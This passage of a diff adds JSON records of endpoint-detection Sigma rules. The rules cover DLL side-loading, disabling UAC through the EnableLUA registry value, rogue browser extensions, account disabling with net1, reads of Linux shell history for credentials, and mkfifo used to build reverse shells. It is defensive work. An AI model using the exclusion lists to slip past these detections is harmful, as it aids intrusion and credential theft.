malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0f267464-6531-4169-a033-e710c3cdd29b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.622596Z", + "creation_date": "2026-03-23T11:45:34.622598Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.622602Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua", + 
"https://attack.mitre.org/techniques/T1562/001/" + ], + "name": "t1562_001_disable_lua.yml", + "content": "title: Limited User Account (LUA) Disabled\nid: 0f267464-6531-4169-a033-e710c3cdd29b\ndescription: |\n Detects Limited User Account (LUA, old name of UAC) being disabled.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process to determine whether this modification is legitimate.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/12/21\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p 
-s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n # C:\\Windows\\system32\\deviceenroller.exe /o C636116F-52B6-470F-81BC-6D6E0D8D2FE6 /c /b\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_qqgame:\n ProcessOriginalFileName: 'qqgame.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Tencent Technology (Shenzhen) Company Limited'\n\n exclusion_wapt:\n ProcessImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains: '?:\\Windows\\CCM\\smsswd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0f267464-6531-4169-a033-e710c3cdd29b", + "rule_name": "Limited User Account (LUA) Disabled", + "rule_description": "Detects Limited User Account (LUA, old name of UAC) being disabled.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process to determine whether this modification is legitimate.\n", + 
"rule_creation_date": "2020-12-21", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.074982Z", + "creation_date": "2026-03-23T11:45:34.074984Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.074989Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/", + "https://attack.mitre.org/techniques/T1176/" + ], + "name": "t1176_chrome_extension_install.yml", + "content": "title: Suspicious Chrome-based Browser Extension Installed\nid: 0f4fc753-a19b-44c4-aa32-f0c68a01a0ef\ndescription: |\n Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\n Every extension must have a 
manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\n Adversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\n It is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\nreferences:\n - https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'rename'\n selection_path:\n - Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - TargetPath:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n\n exclusion_chrome:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_edge:\n Image:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge SxS\\Application\\msedge.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - 
'?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService*'\n - '?:\\Windows\\System32\\svchost.exe -k secsvcs'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SessionEnv'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s ProfSvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_loadstate:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n ProcessName: 'LoadState.exe'\n\n exclusion_copy:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Windows'\n ProcessImage:\n - '?:\\Windows\\System32\\xcopy.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Windows\\syswow64\\Robocopy.exe'\n\n exclusion_oobe:\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessCommandLine: '?:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE shsetup.dll,SHUnattendedSetup specialize'\n\n exclusion_explorer:\n Image: '?:\\Windows\\explorer.exe'\n\n exclusion_dllhost:\n ProcessImage: '?:\\Windows\\System32\\dllhost.exe'\n ProcessCommandLine: '?:\\windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_transwiz:\n ProcessName: 'Transwiz.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'ForensiT Limited'\n\n exclusion_veeam:\n ProcessName: 'VeeamGuestHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature : 
'Veeam Software Group GmbH'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup7Pro.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Fabrice PARISOT'\n\n exclusion_migwiz:\n ProcessOriginalFileName: 'migwiz.exe'\n ProcessDescription: 'Windows Easy Transfer Application'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef", + "rule_name": "Suspicious Chrome-based Browser Extension Installed", + "rule_description": "Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\nEvery extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\nAdversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\nIt is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\n", + "rule_creation_date": "2024-10-09", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1176" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0faba2f2-3820-425b-9718-42eaa1fcb204", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "weak", + 
"alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.074150Z", + "creation_date": "2026-03-23T11:45:34.074152Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.074156Z", + "rule_level": "low", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1531/" + ], + "name": "t1564_net_disable_account.yml", + "content": "title: User Account Disabled via net.exe\nid: 0faba2f2-3820-425b-9718-42eaa1fcb204\ndescription: |\n Detects a user account being disabled via net1.exe.\n Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n It is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\nreferences:\n - https://attack.mitre.org/techniques/T1531/\ndate: 2021/03/15\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1531\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_user:\n CommandLine|contains: 'user'\n\n selection_disable:\n 
CommandLine|contains:\n - '/ACTIVE:NO'\n - '\\ACTIVE:NO'\n\n condition: all of selection_*\nlevel: low\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0faba2f2-3820-425b-9718-42eaa1fcb204", + "rule_name": "User Account Disabled via net.exe", + "rule_description": "Detects a user account being disabled via net1.exe.\nAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nIt is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\n", + "rule_creation_date": "2021-03-15", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.impact" + ], + "rule_technique_tags": [ + "attack.t1531" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0fc4c3c8-8e84-4478-998f-09de36df227c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.622169Z", + "creation_date": 
"2026-03-23T11:45:34.622171Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.622176Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1552/003/" + ], + "name": "t1552_003_shell_history_read_linux.yml", + "content": "title: Shell History File Read (Linux)\nid: 0fc4c3c8-8e84-4478-998f-09de36df227c\ndescription: |\n Detects an attempt to read any of the common shell history files.\n These files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\n It is recommended to analyze the process responsible for reading the files and to determine whether this access is legitimate.\n It can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2022/11/15\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_file:\n - Path|endswith:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n - TargetPath:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n ProcessParentImage|contains: '?'\n\n exclusion_shell:\n ProcessImage|endswith:\n - '/ash'\n - '/bash'\n - '/busybox'\n - '/dash'\n - '/fish'\n - '/sh'\n - '/tcsh'\n - '/zsh'\n\n exclusion_desktop_apps_and_daemons:\n ProcessImage|endswith:\n - '/nautilus'\n - '/eog'\n - '/gedit'\n - '/dolphin'\n - 
'/librewolf'\n - '/firefox'\n - '/chrome'\n - '/code'\n - '/codium'\n - '/sublime_text'\n - '/thunar'\n - '/slack'\n - '/file-roller'\n - '/thunderbird' # /usr/lib/thunderbird/thunderbird\n - '/thunderbird-bin' # /usr/lib/thunderbird/thunderbird-bin\n - '/@joplinapp-desktop'\n - '/gjs-console'\n - '/nemo'\n - '/bacula-fd'\n - '/xdg-desktop-portal-*'\n - '/tracker-miner-fs-3'\n\n exclusion_plasma:\n ProcessParentImage|endswith: '/usr/bin/plasmashell'\n\n exclusion_process:\n - ProcessImage:\n - '/opt/eset/*'\n - '/usr/bin/clamscan'\n - '/usr/bin/com.github.phase1geo.minder'\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/usr/lib/libreoffice/program/soffice.bin'\n - '/opt/ds_agent/ds_am'\n - '/usr/lib/virtualbox/VirtualBox'\n - '*/VirtualBoxVM'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/flameshot'\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/usr/sbin/smbd'\n - '/usr/bin/rsync'\n - '/usr/bin/proxmox-backup-client'\n - '/opt/signal/signal-desktop'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/snap/obsidian/*/obsidian'\n - '/opt/elastic/agent/data/elastic-agent-*/components/osqueryd'\n - '/usr/share/teams/teams'\n - '/opt/teams-for-linux/teams-for-linux'\n - '/snap/teams-for-linux/*/teams-for-linux'\n - '/usr/sbin/libvirtd'\n - '/opt/zotero_linux/zotero-bin'\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/usr/lib/firefox-esr/firefox-esr'\n - '/usr/lib/firefox/firefox-bin'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/opt/rocket.chat/rocketchat-desktop'\n - '/usr/bin/inkscape'\n - '/usr/bin/xfce4-panel'\n - '/usr/bin/caja'\n - '/usr/lib/zotero/zotero-bin'\n - '/usr/bin/hstr'\n - '/usr/bin/aide'\n - '/usr/lib/mongodb-compass/mongodb compass'\n - '/usr/bin/cpio'\n - '/opt/omni/lbin/vbda'\n - '/usr/bin/geany'\n - 
'/usr/bin/okular'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/usr/bin/xfdesktop'\n - '/opt/elastic/agent/data/elastic-agent-*/components/agentbeat'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/nix/store/*-zen-browser-*/lib/zen-*/zen'\n - ProcessCommandLine:\n - '/opt/cybereason/sensor/bin/cbram'\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/bin/python3 /usr/bin/nagstamon'\n\n exclusion_pycharm:\n ProcessImage: '/opt/pycharm-professional/jbr/bin/java'\n ProcessCommandLine|contains: 'com.intellij.idea.main'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_tanium:\n ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0fc4c3c8-8e84-4478-998f-09de36df227c", + "rule_name": "Shell History File Read (Linux)", + "rule_description": "Detects an attempt to read any of the common shell history files.\nThese files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\nIt is recommended to analyze the process responsible for reading the files and to determine whether this 
access is legitimate.\nIt can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\n", + "rule_creation_date": "2022-11-15", + "rule_modified_date": "2026-01-21", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1552.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623164Z", + "creation_date": "2026-03-23T11:45:34.623166Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623170Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://linux.die.net/man/1/mkfifo", + "https://threatpost.com/mitel-voip-bug-exploited/180079/", + "https://attack.mitre.org/techniques/T1559/" + ], + "name": "t1559_fifo_file_created.yml", + "content": "title: FIFO File Created\nid: 0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47\ndescription: |\n Detects the execution of mkfifo or mknod.\n Both utilities can be used to create a FIFO 
file, a special kind of file that can be processed by two process at the same time (one writing to it and the other one reading it).\n Adversaries can create FIFO files in combination with openssl_client to create a reverse shell.\n It is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\nreferences:\n - https://linux.die.net/man/1/mkfifo\n - https://threatpost.com/mitel-voip-bug-exploited/180079/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/12/15\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_mkfifo:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mkfifo'\n\n selection_mknod:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mknod'\n CommandLine|endswith: ' p'\n\n exclusion_bitdefender_install:\n ParentImage: '/usr/bin/??sh'\n ParentCommandLine|contains:\n - '/installer'\n - '/uninstall'\n - '/opt/bitdefender-security-tools/bin/'\n CurrentDirectory|contains: '/bitdefender'\n\n exclusion_rt_sctemp:\n # mkfifo rt_sctemp/ficsecuqlik_dataware.fifo\n # mkfifo rt_sctemp/ventiv_salaries.fifo\n CommandLine: 'mkfifo rt_sctemp/*.fifo'\n\n exclusion_flowcell_dna:\n CommandLine: 'mkfifo /dev/shm/nxf.*/.command.*'\n\n exclusion_qubes:\n ParentCommandLine|contains: '/usr/lib/qubes/qubes-rpc-multiplexer'\n\n exclusion_gitstatus:\n - CommandLine|contains: ' -- /tmp/gitstatus.'\n - ParentCommandLine|contains: ' -- /tmp/gitstatus.'\n\n exclusion_powerlevel10k:\n - CommandLine|contains: ' -- /tmp/p10k.worker.'\n - ParentCommandLine|contains: ' -- /tmp/p10k.worker.'\n\n exclusion_dracut:\n - 
CommandLine|startswith:\n - 'mkfifo /var/tmp/dracut.'\n - 'mkfifo /tmp/dracut.'\n - ParentCommandLine|startswith:\n - '/usr/bin/bash -p /bin/dracut'\n - '/usr/bin/bash -p /usr/bin/dracut'\n\n exclusion_hot_db_backup:\n ParentCommandLine|startswith: '/bin/sh /*/oracle/scripts/hot_db_backup.sh '\n\n exclusion_sqwmys_dumpdatabase:\n ParentCommandLine|startswith: '/bin/ksh /*/sqwareproduction/mysql/bin/sqwmys_dumpdatabase.ksh '\n\n exclusion_eset:\n Ancestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_scality:\n CommandLine: 'mkfifo /tmp/tmp.*/stdout /tmp/tmp.*/stderr'\n ParentCommandLine: '/bin/bash /usr/bin/scality-backup'\n\n exclusion_agent:\n CommandLine|startswith: 'mkfifo /tmp/agent_linux_x86_64.sh.pipe.'\n\n exclusion_qradar:\n GrandparentCommandLine: '/opt/qradar/ca/bin/si-qradarca monitor -debug'\n\n exclusion_code:\n - ParentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n - GrandparentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n\n exclusion_codium:\n ParentImage: '/usr/share/codium/codium'\n\n exclusion_kamailio:\n CommandLine|startswith: 'mkfifo /tmp/kamailio_'\n ParentCommandLine|startswith: '/bin/sh /sbin/kamctl '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/opt/VRTSvcs/bin/Application/ApplicationAgent|'\n - '|/opt/oneautomation/*/smgr/bin/ucybsmgr'\n - '/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/crond|'\n\n exclusion_tmux:\n CommandLine:\n - 'mkfifo /tmp/tmux_fzf_session_name'\n - 'mkfifo /tmp/fzf-fifo?-*'\n - 'mkfifo -m o+w /tmp/fzf-fifo?-*'\n Ancestors|contains: '/usr/bin/tmux|'\n\n exclusion_windsurf:\n GrandparentImage: '/usr/share/windsurf/windsurf'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47", + "rule_name": "FIFO File Created", + "rule_description": "Detects 
